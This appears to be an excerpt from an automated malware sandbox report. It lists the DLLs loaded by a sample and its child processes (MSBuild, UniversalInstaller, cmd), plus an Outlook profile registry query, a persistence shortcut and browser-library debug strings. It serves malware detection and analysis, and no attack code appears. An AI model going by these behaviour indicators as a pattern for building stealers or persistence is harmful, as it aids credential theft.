                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.1.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwrite.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msvcp140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dwmapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d9.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d10warp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wtsapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winsta.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: powrprof.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: umpdc.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dataexchange.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3d11.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dcomp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxgi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dxcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: textinputframework.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coreuicomponents.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msctfui.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: uiautomationcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: d3dcompiler_47.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msimg32.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oledlg.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: oleacc.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netapi32.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wtsapi32.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: samcli.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dwmapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: riched20.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: usp10.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: msls31.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: dbghelp.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pla.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: pdh.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: tdh.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: cabinet.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: wevtapi.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: shdocvw.dll
                            Source: C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exeSection loaded: winhttp.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: pkrvj.7.drLNK file: ..\..\Roaming\driverRemote_debug\UniversalInstaller.exe
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                            Source: 4BfhCycV4B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: mozglue.pdbP source: u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                            Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb@ source: u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303896392.0000013E35A30000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3304143080.0000013E35A40000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3304143080.0000013E35A40000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 00000004.00000002.2304402051.0000000005370000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2302387380.0000000005019000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244478392.000000000361C000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244765590.0000000003970000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308649628.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308799655.0000000004100000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2309045975.00000000045B6000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2529875595.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530363582.0000000005490000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.2752444597.0000000004A17000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 00000004.00000002.2304402051.0000000005370000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2302387380.0000000005019000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244478392.000000000361C000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244765590.0000000003970000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308649628.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308799655.0000000004100000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2309045975.00000000045B6000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2529875595.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530363582.0000000005490000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.2752444597.0000000004A17000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: mozglue.pdb source: u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
